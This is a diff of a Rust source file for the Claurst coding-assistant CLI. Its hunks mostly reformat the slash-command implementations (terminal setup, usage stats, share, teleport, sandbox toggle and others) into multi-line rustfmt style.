-            if unicode_env { "likely supported (LANG/LC_ALL contains UTF)" } else { "check LANG env var" }
+            if unicode_env {
+                "likely supported (LANG/LC_ALL contains UTF)"
+            } else {
+                "check LANG env var"
+            }
         ));
 
         // Check for known good terminals
@@ -5827,11 +6305,15 @@ impl SlashCommand for TerminalSetupCommand {
             term_program.to_lowercase().as_str(),
             "iterm.app" | "iterm2" | "hyper" | "warp" | "alacritty" | "kitty" | "wezterm"
         ) || term_program.to_lowercase().contains("vscode")
-          || term_program.to_lowercase().contains("terminal");
+            || term_program.to_lowercase().contains("terminal");
 
         checks.push(format!(
             "Terminal type: {}",
-            if is_good_terminal { "well-known terminal (good)" } else { "verify settings below" }
+            if is_good_terminal {
+                "well-known terminal (good)"
+            } else {
+                "verify settings below"
+            }
         ));
 
         // Shell detection
@@ -5839,8 +6321,8 @@ impl SlashCommand for TerminalSetupCommand {
         checks.push(format!("Shell:         {}", shell));
 
         // Check for Nerd Fonts (heuristic: environment variable set by some terminals)
-        let nerd_font = std::env::var("NERD_FONT").is_ok()
-            || std::env::var("TERM_NERD_FONT").is_ok();
+        let nerd_font =
+            std::env::var("NERD_FONT").is_ok() || std::env::var("TERM_NERD_FONT").is_ok();
 
         CommandResult::Message(format!(
             "Terminal Setup Diagnostic\n\
@@ -5876,8 +6358,12 @@ impl SlashCommand for TerminalSetupCommand {
 
 #[async_trait]
 impl SlashCommand for ExtraUsageCommand {
-    fn name(&self) -> &str { "extra-usage" }
-    fn description(&self) -> &str { "Show detailed usage statistics: calls, cache, tools" }
+    fn name(&self) -> &str {
+        "extra-usage"
+    }
+    fn description(&self) -> &str {
+        "Show detailed usage statistics: calls, cache, tools"
+    }
     fn help(&self) -> &str {
         "Usage: /extra-usage\n\n\
          Displays extended usage statistics beyond /cost:\n\
@@ -5896,7 +6382,9 @@ impl SlashCommand for ExtraUsageCommand {
         let cost = ctx.cost_tracker.total_cost_usd();
 
         // Estimate API calls from messages (each assistant message ~ 1 API call)
-        let api_calls = ctx.messages.iter()
+        let api_calls = ctx
+            .messages
+            .iter()
             .filter(|m| m.role == claurst_core::types::Role::Assistant)
             .count();
         let api_calls = api_calls.max(1); // at least 1 if we have any data
@@ -5950,7 +6438,11 @@ impl SlashCommand for ExtraUsageCommand {
                 "No cache activity"
             },
             cost = cost,
-            cost_per_k = if total > 0 { cost / (total as f64 / 1000.0) } else { 0.0 },
+            cost_per_k = if total > 0 {
+                cost / (total as f64 / 1000.0)
+            } else {
+                0.0
+            },
         ))
     }
 }
@@ -5959,8 +6451,12 @@ impl SlashCommand for ExtraUsageCommand {
 
 #[async_trait]
 impl SlashCommand for AdvisorCommand {
-    fn name(&self) -> &str { "advisor" }
-    fn description(&self) -> &str { "Set or unset the server-side advisor model" }
+    fn name(&self) -> &str {
+        "advisor"
+    }
+    fn description(&self) -> &str {
+        "Set or unset the server-side advisor model"
+    }
     fn help(&self) -> &str {
         "Usage: /advisor [<model>|off|unset]\n\n\
          Sets the advisor model used for server-side suggestions.\n\
@@ -6023,8 +6519,12 @@ impl SlashCommand for AdvisorCommand {
 
 #[async_trait]
 impl SlashCommand for InstallSlackAppCommand {
-    fn name(&self) -> &str { "install-slack-app" }
-    fn description(&self) -> &str { "Install the Claurst Slack integration" }
+    fn name(&self) -> &str {
+        "install-slack-app"
+    }
+    fn description(&self) -> &str {
+        "Install the Claurst Slack integration"
+    }
     fn help(&self) -> &str {
         "Usage: /install-slack-app\n\n\
          Opens instructions for installing the Claurst Slack app.\n\
@@ -6054,9 +6554,15 @@ impl SlashCommand for InstallSlackAppCommand {
 
 #[async_trait]
 impl SlashCommand for FastCommand {
-    fn name(&self) -> &str { "fast" }
-    fn aliases(&self) -> Vec<&str> { vec!["speed"] }
-    fn description(&self) -> &str { "Toggle fast mode (uses a faster/cheaper model)" }
+    fn name(&self) -> &str {
+        "fast"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["speed"]
+    }
+    fn description(&self) -> &str {
+        "Toggle fast mode (uses a faster/cheaper model)"
+    }
     fn help(&self) -> &str {
         "Usage: /fast [on|off]\n\n\
          Fast mode switches to a faster, more economical model variant\n\
@@ -6085,7 +6591,10 @@ impl SlashCommand for FastCommand {
         }
 
         let fast_model = "claude-haiku-4-5";
-        let normal_model = ctx.config.model.as_deref()
+        let normal_model = ctx
+            .config
+            .model
+            .as_deref()
             .unwrap_or(claurst_core::constants::DEFAULT_MODEL);
 
         if enable {
@@ -6118,9 +6627,15 @@ impl SlashCommand for FastCommand {
 
 #[async_trait]
 impl SlashCommand for ThinkBackCommand {
-    fn name(&self) -> &str { "think-back" }
-    fn aliases(&self) -> Vec<&str> { vec!["thinkback"] }
-    fn description(&self) -> &str { "Show thinking traces from previous responses in this session" }
+    fn name(&self) -> &str {
+        "think-back"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["thinkback"]
+    }
+    fn description(&self) -> &str {
+        "Show thinking traces from previous responses in this session"
+    }
     fn help(&self) -> &str {
         "Usage: /think-back [n]\n\n\
          Displays the thinking/reasoning traces from the most recent model responses.\n\
@@ -6152,7 +6667,11 @@ impl SlashCommand for ThinkBackCommand {
                     })
                     .collect::<Vec<_>>()
                     .join("\n\n");
-                if thinking.is_empty() { None } else { Some((idx, thinking)) }
+                if thinking.is_empty() {
+                    None
+                } else {
+                    Some((idx, thinking))
+                }
             })
             .collect();
 
@@ -6188,8 +6707,12 @@ impl SlashCommand for ThinkBackCommand {
 
 #[async_trait]
 impl SlashCommand for ThinkBackPlayCommand {
-    fn name(&self) -> &str { "thinkback-play" }
-    fn description(&self) -> &str { "Replay a thinking trace as an animated walkthrough" }
+    fn name(&self) -> &str {
+        "thinkback-play"
+    }
+    fn description(&self) -> &str {
+        "Replay a thinking trace as an animated walkthrough"
+    }
     fn help(&self) -> &str {
         "Usage: /thinkback-play [n]\n\n\
          Replays a previous thinking trace, formatted for easy reading.\n\
@@ -6219,7 +6742,11 @@ impl SlashCommand for ThinkBackPlayCommand {
                     })
                     .collect::<Vec<_>>()
                     .join("\n\n");
-                if t.is_empty() { None } else { Some(t) }
+                if t.is_empty() {
+                    None
+                } else {
+                    Some(t)
+                }
             })
             .collect();
 
@@ -6258,10 +6785,18 @@ impl SlashCommand for ThinkBackPlayCommand {
 
 #[async_trait]
 impl SlashCommand for FeedbackCommand {
-    fn name(&self) -> &str { "report" }
-    fn aliases(&self) -> Vec<&str> { vec![] }
-    fn description(&self) -> &str { "Open the GitHub issues page to report a bug or request a feature" }
-    fn hidden(&self) -> bool { true } // surfaced via BugCommand alias; hidden to avoid duplicate
+    fn name(&self) -> &str {
+        "report"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec![]
+    }
+    fn description(&self) -> &str {
+        "Open the GitHub issues page to report a bug or request a feature"
+    }
+    fn hidden(&self) -> bool {
+        true
+    } // surfaced via BugCommand alias; hidden to avoid duplicate
     fn help(&self) -> &str {
         "Usage: /report [description]\n\n\
          Opens the GitHub issues tracker. If a description is provided,\n\
@@ -6275,19 +6810,12 @@ impl SlashCommand for FeedbackCommand {
             url.to_string()
         } else {
             // Append as a body query param
-            format!(
-                "{}?body={}",
-                url,
-                urlencoding::encode(report)
-            )
+            format!("{}?body={}", url, urlencoding::encode(report))
         };
 
         match open_with_system(&display_url) {
             Ok(_) => CommandResult::Message(format!("Opened issue tracker: {}", url)),
-            Err(_) => CommandResult::Message(format!(
-                "Please visit {} to submit a report.",
-                url
-            )),
+            Err(_) => CommandResult::Message(format!("Please visit {} to submit a report.", url)),
         }
     }
 }
@@ -6296,9 +6824,15 @@ impl SlashCommand for FeedbackCommand {
 
 #[async_trait]
 impl SlashCommand for ColorSetCommand {
-    fn name(&self) -> &str { "color-set" }
-    fn hidden(&self) -> bool { true }
-    fn description(&self) -> &str { "Internal: set prompt color — use /color instead" }
+    fn name(&self) -> &str {
+        "color-set"
+    }
+    fn hidden(&self) -> bool {
+        true
+    }
+    fn description(&self) -> &str {
+        "Internal: set prompt color — use /color instead"
+    }
 
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let color = args.trim();
@@ -6317,10 +6851,11 @@ impl SlashCommand for ColorSetCommand {
         } else {
             // Validate hex or named color
             let known_colors = [
-                "red", "green", "blue", "yellow", "cyan", "magenta",
-                "white", "orange", "purple", "pink", "gray", "grey",
+                "red", "green", "blue", "yellow", "cyan", "magenta", "white", "orange", "purple",
+                "pink", "gray", "grey",
             ];
-            let is_hex = color.starts_with('#') && (color.len() == 4 || color.len() == 7)
+            let is_hex = color.starts_with('#')
+                && (color.len() == 4 || color.len() == 7)
                 && color[1..].chars().all(|c| c.is_ascii_hexdigit());
             if !is_hex && !known_colors.contains(&color.to_lowercase().as_str()) {
                 return CommandResult::Error(format!(
@@ -6346,8 +6881,12 @@ impl SlashCommand for ColorSetCommand {
 
 #[async_trait]
 impl SlashCommand for SearchCommand {
-    fn name(&self) -> &str { "search" }
-    fn description(&self) -> &str { "Search across all sessions" }
+    fn name(&self) -> &str {
+        "search"
+    }
+    fn description(&self) -> &str {
+        "Search across all sessions"
+    }
     fn help(&self) -> &str {
         "Usage: /search <query>\n\n\
          Searches session titles and message content in the local SQLite\n\
@@ -6381,19 +6920,11 @@ impl SlashCommand for SearchCommand {
 
         let results = match store.search_sessions(query) {
             Ok(r) => r,
-            Err(e) => {
-                return CommandResult::Error(format!(
-                    "Search failed: {}",
-                    e
-                ))
-            }
+            Err(e) => return CommandResult::Error(format!("Search failed: {}", e)),
         };
 
         if results.is_empty() {
-            return CommandResult::Message(format!(
-                "No sessions found matching \"{}\".",
-                query
-            ));
+            return CommandResult::Message(format!("No sessions found matching \"{}\".", query));
         }
 
         let mut out = format!(
@@ -6421,8 +6952,12 @@ impl SlashCommand for SearchCommand {
 
 #[async_trait]
 impl SlashCommand for ShareCommand {
-    fn name(&self) -> &str { "share" }
-    fn description(&self) -> &str { "Create a shareable URL for the current session" }
+    fn name(&self) -> &str {
+        "share"
+    }
+    fn description(&self) -> &str {
+        "Create a shareable URL for the current session"
+    }
     fn help(&self) -> &str {
         "Usage: /share\n\n\
          Attempts to create a public share link for the current conversation\n\
@@ -6447,10 +6982,7 @@ impl SlashCommand for ShareCommand {
         let messages_json = match serde_json::to_value(&ctx.messages) {
             Ok(v) => v,
             Err(e) => {
-                return CommandResult::Error(format!(
-                    "Failed to serialize session messages: {}",
-                    e
-                ))
+                return CommandResult::Error(format!("Failed to serialize session messages: {}", e))
             }
         };
 
@@ -6465,12 +6997,7 @@ impl SlashCommand for ShareCommand {
             .build()
         {
             Ok(c) => c,
-            Err(e) => {
-                return CommandResult::Error(format!(
-                    "Failed to build HTTP client: {}",
-                    e
-                ))
-            }
+            Err(e) => return CommandResult::Error(format!("Failed to build HTTP client: {}", e)),
         };
 
         let base_url = std::env::var("ANTHROPIC_BASE_URL")
@@ -6478,13 +7005,9 @@ impl SlashCommand for ShareCommand {
         let url = format!("{}/api/claude_code/share_session", base_url);
 
         let req = if use_bearer {
-            client
-                .post(&url)
-                .bearer_auth(&credential)
+            client.post(&url).bearer_auth(&credential)
         } else {
-            client
-                .post(&url)
-                .header("x-api-key", &credential)
+            client.post(&url).header("x-api-key", &credential)
         };
 
         let resp = req
@@ -6595,8 +7118,12 @@ mod teleport_bundle {
 
 #[async_trait]
 impl SlashCommand for TeleportCommand {
-    fn name(&self) -> &str { "teleport" }
-    fn description(&self) -> &str { "Export/import/link session context as a portable bundle" }
+    fn name(&self) -> &str {
+        "teleport"
+    }
+    fn description(&self) -> &str {
+        "Export/import/link session context as a portable bundle"
+    }
     fn help(&self) -> &str {
         "Usage:\n\
          \n\
@@ -6669,7 +7196,9 @@ impl SlashCommand for TeleportCommand {
                                         for key in &candidates {
                                             if let Some(v) = input.get(key) {
                                                 if let Some(s) = v.as_str() {
-                                                    if !s.is_empty() && !seen.contains(&s.to_string()) {
+                                                    if !s.is_empty()
+                                                        && !seen.contains(&s.to_string())
+                                                    {
                                                         seen.push(s.to_string());
                                                     }
                                                 }
@@ -6720,7 +7249,11 @@ impl SlashCommand for TeleportCommand {
                             action: PermissionAction::Deny,
                         });
                     }
-                    TeleportPermissions { allowed, denied, rules }
+                    TeleportPermissions {
+                        allowed,
+                        denied,
+                        rules,
+                    }
                 };
 
                 // ---- build bundle -----------------------------------------
@@ -6740,7 +7273,9 @@ impl SlashCommand for TeleportCommand {
                 // ---- serialize and write ----------------------------------
                 let json = match serde_json::to_string_pretty(&bundle) {
                     Ok(j) => j,
-                    Err(e) => return CommandResult::Error(format!("Failed to serialize bundle: {}", e)),
+                    Err(e) => {
+                        return CommandResult::Error(format!("Failed to serialize bundle: {}", e))
+                    }
                 };
 
                 if let Err(e) = std::fs::write(&output_path, &json) {
@@ -6770,28 +7305,30 @@ impl SlashCommand for TeleportCommand {
 
             "import" => {
                 if rest.is_empty() {
-                    return CommandResult::Error(
-                        "Usage: /teleport import <file>".to_string(),
-                    );
+                    return CommandResult::Error("Usage: /teleport import <file>".to_string());
                 }
 
                 let path = std::path::PathBuf::from(rest);
 
                 let data = match std::fs::read_to_string(&path) {
                     Ok(s) => s,
-                    Err(e) => return CommandResult::Error(format!(
-                        "Cannot read teleport bundle '{}': {}",
-                        path.display(),
-                        e
-                    )),
+                    Err(e) => {
+                        return CommandResult::Error(format!(
+                            "Cannot read teleport bundle '{}': {}",
+                            path.display(),
+                            e
+                        ))
+                    }
                 };
 
                 let bundle: TeleportBundle = match serde_json::from_str(&data) {
                     Ok(b) => b,
-                    Err(e) => return CommandResult::Error(format!(
-                        "Failed to parse teleport bundle: {}",
-                        e
-                    )),
+                    Err(e) => {
+                        return CommandResult::Error(format!(
+                            "Failed to parse teleport bundle: {}",
+                            e
+                        ))
+                    }
                 };
 
                 // ---- validate version ------------------------------------
@@ -6845,7 +7382,11 @@ impl SlashCommand for TeleportCommand {
                     exported_at,
                     msg_count,
                     working_dir_display,
-                    if dir_restored { " (restored)" } else { " (path not found, skipped)" },
+                    if dir_restored {
+                        " (restored)"
+                    } else {
+                        " (path not found, skipped)"
+                    },
                     allowed_count,
                     denied_count,
                     files_count,
@@ -6854,8 +7395,8 @@ impl SlashCommand for TeleportCommand {
 
             "link" => {
                 // ---- build a minimal bundle for the link (no env vars) ---
-                use teleport_bundle::TeleportBundle;
                 use base64::Engine as _;
+                use teleport_bundle::TeleportBundle;
 
                 let permissions = {
                     let allowed = ctx.config.allowed_tools.clone();
@@ -6876,7 +7417,11 @@ impl SlashCommand for TeleportCommand {
                             action: PermissionAction::Deny,
                         });
                     }
-                    TeleportPermissions { allowed, denied, rules }
+                    TeleportPermissions {
+                        allowed,
+                        denied,
+                        rules,
+                    }
                 };
 
                 let bundle = TeleportBundle {
@@ -6887,22 +7432,28 @@ impl SlashCommand for TeleportCommand {
                     permissions,
                     model: ctx.config.model.clone(),
                     effort: None,
-                    files: Vec::new(), // keep link compact
+                    files: Vec::new(),                     // keep link compact
                     env: std::collections::HashMap::new(), // omit env for security
                     exported_at: chrono::Utc::now().to_rfc3339(),
                 };
 
                 let json = match serde_json::to_string(&bundle) {
                     Ok(j) => j,
-                    Err(e) => return CommandResult::Error(format!("Failed to serialize bundle: {}", e)),
+                    Err(e) => {
+                        return CommandResult::Error(format!("Failed to serialize bundle: {}", e))
+                    }
                 };
 
-                let encoded = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(json.as_bytes());
+                let encoded =
+                    base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(json.as_bytes());
                 let link = format!("teleport://{}", encoded);
 
                 // Warn if the link is very long.
                 let size_hint = if link.len() > 8192 {
-                    format!("\n(Link is {} bytes — consider /teleport export for large sessions)", link.len())
+                    format!(
+                        "\n(Link is {} bytes — consider /teleport export for large sessions)",
+                        link.len()
+                    )
                 } else {
                     String::new()
                 };
@@ -6910,9 +7461,7 @@ impl SlashCommand for TeleportCommand {
                 CommandResult::Message(format!(
                     "Teleport link generated for session {}:\n\n{}{}\n\n\
                      Share this link or use: /teleport import <link-url>",
-                    ctx.session_id,
-                    link,
-                    size_hint,
+                    ctx.session_id, link, size_hint,
                 ))
             }
 
@@ -6923,7 +7472,8 @@ impl SlashCommand for TeleportCommand {
                      \x20 /teleport export [--output <file>]   export session to .teleport bundle\n\
                      \x20 /teleport import <file>              restore a .teleport bundle\n\
                      \x20 /teleport link                       generate a teleport:// deep link\n\
-                     \nSee /help teleport for details.".to_string()
+                     \nSee /help teleport for details."
+                        .to_string(),
                 )
             }
 
@@ -6939,8 +7489,12 @@ impl SlashCommand for TeleportCommand {
 
 #[async_trait]
 impl SlashCommand for BtwCommand {
-    fn name(&self) -> &str { "btw" }
-    fn description(&self) -> &str { "Ask a side question without adding it to conversation history" }
+    fn name(&self) -> &str {
+        "btw"
+    }
+    fn description(&self) -> &str {
+        "Ask a side question without adding it to conversation history"
+    }
     fn help(&self) -> &str {
         "Usage: /btw <question>\n\n\
          Submits a background question to the model without it becoming part of\n\
@@ -6972,9 +7526,15 @@ impl SlashCommand for BtwCommand {
 
 #[async_trait]
 impl SlashCommand for CtxVizCommand {
-    fn name(&self) -> &str { "ctx-viz" }
-    fn aliases(&self) -> Vec<&str> { vec!["context-visualizer", "ctx"] }
-    fn description(&self) -> &str { "Visualize context window usage breakdown by category" }
+    fn name(&self) -> &str {
+        "ctx-viz"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["context-visualizer", "ctx"]
+    }
+    fn description(&self) -> &str {
+        "Visualize context window usage breakdown by category"
+    }
     fn help(&self) -> &str {
         "Usage: /ctx-viz\n\n\
          Shows a detailed breakdown of how the context window is being used:\n\
@@ -6990,16 +7550,17 @@ impl SlashCommand for CtxVizCommand {
 
         // Estimate system prompt tokens: rough chars/4 approximation
         // Build a minimal system prompt to estimate its size.
-        let sys_prompt_chars: usize = ctx.config.custom_system_prompt
+        let sys_prompt_chars: usize = ctx
+            .config
+            .custom_system_prompt
             .as_deref()
             .map(|s| s.len())
             .unwrap_or(2400 * 4); // fallback: ~2400 tokens worth
         let sys_prompt_tokens = (sys_prompt_chars / 4).max(1) as u64;
 
         // Estimate conversation tokens from messages
-        let (conv_chars, tool_chars): (usize, usize) = ctx.messages.iter().fold(
-            (0, 0),
-            |(conv, tool), msg| {
+        let (conv_chars, tool_chars): (usize, usize) =
+            ctx.messages.iter().fold((0, 0), |(conv, tool), msg| {
                 let text = msg.get_all_text();
                 // Heuristic: if the message looks like a tool result, count separately
                 if msg.role == claurst_core::types::Role::User && text.starts_with('[') {
@@ -7007,8 +7568,7 @@ impl SlashCommand for CtxVizCommand {
                 } else {
                     (conv + text.len(), tool)
                 }
-            },
-        );
+            });
 
         let conv_tokens = (conv_chars / 4) as u64;
         let tool_tokens = (tool_chars / 4) as u64;
@@ -7046,9 +7606,15 @@ impl SlashCommand for CtxVizCommand {
 
 #[async_trait]
 impl SlashCommand for SandboxToggleCommand {
-    fn name(&self) -> &str { "sandbox-toggle" }
-    fn aliases(&self) -> Vec<&str> { vec!["sandbox"] }
-    fn description(&self) -> &str { "Enable or disable sandboxed execution of shell commands" }
+    fn name(&self) -> &str {
+        "sandbox-toggle"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["sandbox"]
+    }
+    fn description(&self) -> &str {
+        "Enable or disable sandboxed execution of shell commands"
+    }
     fn help(&self) -> &str {
         "Usage: /sandbox-toggle [on|off|exclude <pattern>|status]\n\n\
          Toggles sandboxed execution of bash/shell commands.\n\
@@ -7069,14 +7635,18 @@ impl SlashCommand for SandboxToggleCommand {
 
         // Platform support check: sandbox requires macOS or Linux (not Windows native).
         let platform = std::env::consts::OS;
-        let is_wsl = std::env::var("WSL_DISTRO_NAME").is_ok()
-            || std::env::var("WSL_INTEROP").is_ok();
+        let is_wsl =
+            std::env::var("WSL_DISTRO_NAME").is_ok() || std::env::var("WSL_INTEROP").is_ok();
         let is_supported = matches!(platform, "linux" | "macos") || is_wsl;
 
         // Handle subcommand: status
         if args == "status" {
             let ui = load_ui_settings();
-            let mode = if ui.sandbox_mode.unwrap_or(false) { "enabled" } else { "disabled" };
+            let mode = if ui.sandbox_mode.unwrap_or(false) {
+                "enabled"
+            } else {
+                "disabled"
+            };
             let excl = if ui.sandbox_excluded_commands.is_empty() {
                 "(none)".to_string()
             } else {
@@ -7089,7 +7659,10 @@ impl SlashCommand for SandboxToggleCommand {
             let platform_note = if is_supported {
                 format!("\u{2713} Supported on this platform ({})", platform)
             } else {
-                format!("\u{2717} Not supported on this platform ({}). Requires macOS, Linux, or WSL2.", platform)
+                format!(
+                    "\u{2717} Not supported on this platform ({}). Requires macOS, Linux, or WSL2.",
+                    platform
+                )
             };
             return CommandResult::Message(format!(
                 "Sandbox mode: {}\n\
@@ -7106,7 +7679,8 @@ impl SlashCommand for SandboxToggleCommand {
             if rest.is_empty() {
                 return CommandResult::Error(
                     "Usage: /sandbox-toggle exclude <command-pattern>\n\
-                     Example: /sandbox-toggle exclude \"npm run test:*\"".to_string()
+                     Example: /sandbox-toggle exclude \"npm run test:*\""
+                        .to_string(),
                 );
             }
             // Strip surrounding quotes if present
@@ -7133,8 +7707,13 @@ impl SlashCommand for SandboxToggleCommand {
         }
 
         // Platform guard for toggling on/off
-        if !is_supported && (args == "on" || args == "enable" || args == "enabled"
-            || args == "true" || args == "1" || args.is_empty())
+        if !is_supported
+            && (args == "on"
+                || args == "enable"
+                || args == "enabled"
+                || args == "true"
+                || args == "1"
+                || args.is_empty())
         {
             let msg = if is_wsl {
                 "Error: Sandboxing requires WSL2. WSL1 is not supported.".to_string()
@@ -7146,8 +7725,11 @@ impl SlashCommand for SandboxToggleCommand {
                 )
             };
             // Only hard-block enabling; allow off/status even on unsupported platforms.
-            if args != "off" && args != "disable" && args != "disabled"
-                && args != "false" && args != "0"
+            if args != "off"
+                && args != "disable"
+                && args != "disabled"
+                && args != "false"
+                && args != "0"
             {
                 return CommandResult::Error(msg);
             }
@@ -7187,8 +7769,12 @@ impl SlashCommand for SandboxToggleCommand {
 
 #[async_trait]
 impl SlashCommand for HeapdumpCommand {
-    fn name(&self) -> &str { "heapdump" }
-    fn description(&self) -> &str { "Show process memory and diagnostic information" }
+    fn name(&self) -> &str {
+        "heapdump"
+    }
+    fn description(&self) -> &str {
+        "Show process memory and diagnostic information"
+    }
     fn help(&self) -> &str {
         "Usage: /heapdump\n\n\
          Displays a diagnostic snapshot of the current process:\n\
@@ -7245,8 +7831,12 @@ impl SlashCommand for HeapdumpCommand {
 
 #[async_trait]
 impl SlashCommand for InsightsCommand {
-    fn name(&self) -> &str { "insights" }
-    fn description(&self) -> &str { "Generate a session analysis report with conversation statistics" }
+    fn name(&self) -> &str {
+        "insights"
+    }
+    fn description(&self) -> &str {
+        "Generate a session analysis report with conversation statistics"
+    }
     fn help(&self) -> &str {
         "Usage: /insights\n\n\
          Analyses the current conversation and prints a statistics report:\n\
@@ -7257,10 +7847,12 @@ impl SlashCommand for InsightsCommand {
         let messages = &ctx.messages;
 
         // Count turns (user / assistant pairs)
-        let user_turns: usize = messages.iter()
+        let user_turns: usize = messages
+            .iter()
             .filter(|m| matches!(m.role, claurst_core::types::Role::User))
             .count();
-        let assistant_turns: usize = messages.iter()
+        let assistant_turns: usize = messages
+            .iter()
             .filter(|m| matches!(m.role, claurst_core::types::Role::Assistant))
             .count();
         let total_turns = user_turns.min(assistant_turns);
@@ -7332,8 +7924,12 @@ impl SlashCommand for InsightsCommand {
 
 #[async_trait]
 impl SlashCommand for UltrareviewCommand {
-    fn name(&self) -> &str { "ultrareview" }
-    fn description(&self) -> &str { "Run an exhaustive multi-dimensional code review" }
+    fn name(&self) -> &str {
+        "ultrareview"
+    }
+    fn description(&self) -> &str {
+        "Run an exhaustive multi-dimensional code review"
+    }
     fn help(&self) -> &str {
         "Usage: /ultrareview [path]\n\n\
          Runs a comprehensive code review that goes beyond /review and\n\
@@ -7436,13 +8032,21 @@ impl SlashCommand for UltrareviewCommand {
 
 #[async_trait]
 impl SlashCommand for NamedCommandAdapter {
-    fn name(&self) -> &str { self.slash_name }
+    fn name(&self) -> &str {
+        self.slash_name
+    }
 
-    fn aliases(&self) -> Vec<&str> { self.slash_aliases.to_vec() }
+    fn aliases(&self) -> Vec<&str> {
+        self.slash_aliases.to_vec()
+    }
 
-    fn description(&self) -> &str { self.slash_description }
+    fn description(&self) -> &str {
+        self.slash_description
+    }
 
-    fn help(&self) -> &str { self.slash_help }
+    fn help(&self) -> &str {
+        self.slash_help
+    }
 
     async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult {
         execute_named_command_from_slash(self.target_name, args, ctx)
@@ -7453,8 +8057,12 @@ impl SlashCommand for NamedCommandAdapter {
 
 #[async_trait]
 impl SlashCommand for UndoCommand {
-    fn name(&self) -> &str { "undo" }
-    fn description(&self) -> &str { "Revert file changes made by a tool call in this session" }
+    fn name(&self) -> &str {
+        "undo"
+    }
+    fn description(&self) -> &str {
+        "Revert file changes made by a tool call in this session"
+    }
     fn help(&self) -> &str {
         "Usage: /undo [<tool_use_id>]\n\n\
          Without an argument, lists all tool calls that modified files in this session.\n\n\
@@ -7528,8 +8136,12 @@ impl SlashCommand for UndoCommand {
 
 #[async_trait]
 impl SlashCommand for ProvidersCommand {
-    fn name(&self) -> &str { "providers" }
-    fn description(&self) -> &str { "List available AI providers and their status" }
+    fn name(&self) -> &str {
+        "providers"
+    }
+    fn description(&self) -> &str {
+        "List available AI providers and their status"
+    }
     fn help(&self) -> &str {
         "Usage: /providers\n\nList all providers registered in the model registry with their\nmodel counts, context windows, and pricing information."
     }
@@ -7559,15 +8171,23 @@ impl SlashCommand for ProvidersCommand {
         let mut lines = vec!["Available providers:\n".to_string()];
         for provider in &provider_keys {
             let models = &by_provider[provider];
-            lines.push(format!("\n{} ({} model{})", provider.to_uppercase(), models.len(),
-                if models.len() == 1 { "" } else { "s" }));
+            lines.push(format!(
+                "\n{} ({} model{})",
+                provider.to_uppercase(),
+                models.len(),
+                if models.len() == 1 { "" } else { "s" }
+            ));
             for m in models.iter().take(3) {
                 let cost_str = match (m.cost_input, m.cost_output) {
                     (Some(i), Some(o)) => format!("${:.2}/${:.2} per 1M", i, o),
                     _ => "free/local".to_string(),
                 };
-                lines.push(format!("  {} — {}K ctx, {}",
-                    m.info.id, m.info.context_window / 1000, cost_str));
+                lines.push(format!(
+                    "  {} — {}K ctx, {}",
+                    m.info.id,
+                    m.info.context_window / 1000,
+                    cost_str
+                ));
             }
             if models.len() > 3 {
                 lines.push(format!("  ... and {} more", models.len() - 3));
@@ -7582,8 +8202,12 @@ impl SlashCommand for ProvidersCommand {
 
 #[async_trait]
 impl SlashCommand for ConnectCommand {
-    fn name(&self) -> &str { "connect" }
-    fn description(&self) -> &str { "Connect an AI provider" }
+    fn name(&self) -> &str {
+        "connect"
+    }
+    fn description(&self) -> &str {
+        "Connect an AI provider"
+    }
     fn help(&self) -> &str {
         "Usage: /connect\n\nOpens the interactive provider picker dialog.\nSelect a provider to see setup instructions."
     }
@@ -7598,8 +8222,12 @@ impl SlashCommand for ConnectCommand {
 
 #[async_trait]
 impl SlashCommand for AgentCommand {
-    fn name(&self) -> &str { "agent" }
-    fn description(&self) -> &str { "List available agents or get info about a specific agent" }
+    fn name(&self) -> &str {
+        "agent"
+    }
+    fn description(&self) -> &str {
+        "List available agents or get info about a specific agent"
+    }
     fn help(&self) -> &str {
         "Usage: /agent [name]\n\nWithout arguments, lists all available named agents.\nWith a name, shows details for that agent.\n\nTo use an agent, start Claurst with: --agent <name>"
     }
@@ -7657,9 +8285,7 @@ impl SlashCommand for AgentCommand {
             if let Some(ref prompt) = def.prompt {
                 output.push_str(&format!("\nSystem prompt prefix:\n  {}\n", prompt));
             }
-            output.push_str(&format!(
-                "\nTo activate: claude --agent {}", agent_name
-            ));
+            output.push_str(&format!("\nTo activate: claude --agent {}", agent_name));
             CommandResult::Message(output)
         } else {
             CommandResult::Error(format!(
@@ -7857,9 +8483,9 @@ pub fn all_commands() -> Vec<Box<dyn SlashCommand>> {
 /// Find a command by name or alias.
 pub fn find_command(name: &str) -> Option<Box<dyn SlashCommand>> {
     let name = name.trim_start_matches('/');
-    all_commands().into_iter().find(|c| {
-        c.name() == name || c.aliases().contains(&name)
-    })
+    all_commands()
+        .into_iter()
+        .find(|c| c.name() == name || c.aliases().contains(&name))
 }
 
 /// Build `HelpEntry` values for all non-hidden commands, suitable for
@@ -7889,15 +8515,22 @@ struct TemplateCommand {
 
 #[async_trait]
 impl SlashCommand for TemplateCommand {
-    fn name(&self) -> &str { &self.name }
+    fn name(&self) -> &str {
+        &self.name
+    }
     fn description(&self) -> &str {
-        self.template.description.as_deref().unwrap_or("Custom command")
+        self.template
+            .description
+            .as_deref()
+            .unwrap_or("Custom command")
     }
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let mut words = args.split_whitespace();
         let arg1 = words.next().unwrap_or("");
         let arg2 = words.next().unwrap_or("");
-        let prompt = self.template.template
+        let prompt = self
+            .template
+            .template
             .replace("$ARGUMENTS", args)
             .replace("$1", arg1)
             .replace("$2", arg2);
@@ -7908,12 +8541,16 @@ impl SlashCommand for TemplateCommand {
 /// Build slash commands from user-defined command templates stored in
 /// `settings.commands`.
 pub fn commands_from_settings(settings: &claurst_core::Settings) -> Vec<Box<dyn SlashCommand>> {
-    settings.commands.iter().map(|(name, template)| {
-        Box::new(TemplateCommand {
-            name: name.clone(),
-            template: template.clone(),
-        }) as Box<dyn SlashCommand>
-    }).collect()
+    settings
+        .commands
+        .iter()
+        .map(|(name, template)| {
+            Box::new(TemplateCommand {
+                name: name.clone(),
+                template: template.clone(),
+            }) as Box<dyn SlashCommand>
+        })
+        .collect()
 }
 
